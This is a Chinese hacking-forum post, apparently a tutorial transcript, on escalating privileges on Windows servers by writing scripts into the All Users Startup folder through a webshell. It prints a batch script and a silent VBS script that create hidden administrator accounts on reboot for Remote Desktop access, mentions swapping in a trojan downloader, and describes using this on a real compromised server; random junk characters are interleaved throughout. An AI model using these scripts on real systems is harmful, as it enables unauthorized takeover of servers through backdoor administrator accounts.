- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是9 `$ A z# f8 w; I9 _
启动 提权: D; |2 h* e* D( R: v
C:\Docume~1\All Users\「开始」菜单\程序\启动
- M, B0 B6 U, q) L8 s& f& m2 q在这里必须有写入权限 否则此方法无效0 y. c: O' H M( L$ c1 o
因为我是在网吧 这里显示不了路径
! | x" B& I4 ~( L我去服务器上演示给大家看$ O- Q1 a" d M) q% r: s; D
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
8 V1 p% c% @' v+ V8 D文件 从而运行我们的文件) m6 W8 ~( D4 p4 _9 b' G" U! @& y
这里有两中方式 第一种是批处理: k/ E- f& O) Z5 Q
我们来看下目前 我机器上的用户组6 ~& R6 |9 w1 c$ J7 {# B, D: C6 b1 ?
目前我们没有521这个用户8 S" `) ?' G, z2 H$ L/ q. D
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示8 B( Z- J+ N: H, E! w Y+ S
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现
* y* A2 S* Y* F- w; p: ^: P5 y( n下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的7 e$ C- ?. }' P! r
大家看 已经成功加入了WMMY用户5 I; @ ^) |+ u7 i/ ?& @+ n5 q, i
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了
6 i+ r$ L; u4 s当前终端服务端口: 3389 D* V% M8 [) b6 Y' W1 ]7 a
系统自动登录功能未开启5 u" o( u. l8 W9 o q
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
" r8 N5 J' a b6 g- P: {5 NC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
) {: s' k* e1 @第一种隐蔽性太差 我们就用第二种吧* ^" ]' m. a9 X `, t
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
\1 @, w5 n# I! ]( ?- r1 t( d从而取得了3389的登陆权限; q8 E0 ~% C% N- A) v
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马# E* u6 M% ]: [& e
基本原理都差不多 我就不多介绍了- C# M' M2 k3 m8 t. B7 S- Z
教程结束```) ^+ W& `, O8 V& ?; {
@echo off
8 Z6 T2 [0 ~2 m' [$ Y, c; @$ B6 Rnet user 521 521 /add
6 Z( W% J) B# L0 k" \- }2 P( @net localgroup administrators 521 /add
5 a' n# b9 p, g8 a
$ V0 T& l. @3 L, c7 f% bon Error Resume next5 G# K0 C6 ]8 K' h7 K" s- I$ G [
set wshshell=createobject("wscript.shell")- H2 N' l3 z# `5 x
a=wshshell.run("net user wmmy$ 1227 /add",0)
. N9 w3 z4 u: c, xa=wshshell.run("net localgroup administrators wmmy$ /add",0)4 t& Q4 X) Z5 H% ?. b
8 ^7 n* ]' Y' a! ~ `; B" K
! I" q8 W4 |$ z1 \8 ]! J点击下载
/ r8 s/ o; K# v( k |
-
2
评分人数
-
|